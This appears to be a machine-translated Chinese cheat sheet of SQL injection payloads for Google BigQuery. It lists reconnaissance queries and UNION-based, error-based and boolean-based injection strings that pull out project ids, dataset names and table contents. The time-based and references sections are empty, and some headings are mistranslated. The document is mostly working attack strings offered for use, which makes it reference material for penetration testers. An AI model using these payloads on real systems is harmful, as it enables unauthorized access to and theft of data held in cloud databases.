| 作者 |
修订时间 |
 |
2023-07-05 21:37:29 |
总结
侦查
- 使用经典的单引号触发错误:
'
- 使用回溯符号识别 BigQuery:
SELECT .... FROM `` AS ...
# Gathering project id
select @@project_id
# Gathering all dataset names
select schema_name from INFORMATION_SCHEMA.SCHEMATA
# Gathering data from specific project id & dataset
select * from `project_id.dataset_name.table_name`
大的
select 1#from here it is not working
select 1/*between those it is not working*/
基于 BigQuery 联合
UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
true) GROUP BY column_name LIMIT 1 UNION ALL SELECT (SELECT 'asd'),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
true) GROUP BY column_name LIMIT 1 UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
' GROUP BY column_name UNION ALL SELECT column_name,1,1 FROM (select column_name AS new_name from `project_id.dataset_name.table_name`) AS A GROUP BY column_name#
基于 BigQuery 错误
# Error based - division by zero
' OR if(1/(length((select('a')))-1)=1,true,false) OR '
# Error based - casting: select CAST(@@project_id AS INT64)
dataset_name.column_name` union all select CAST(@@project_id AS INT64) ORDER BY 1 DESC#
基于 BigQuery 布尔值
' WHERE SUBSTRING((select column_name from `project_id.dataset_name.table_name` limit 1),1,1)='A'#
基于时间的 BigQuery
参考文献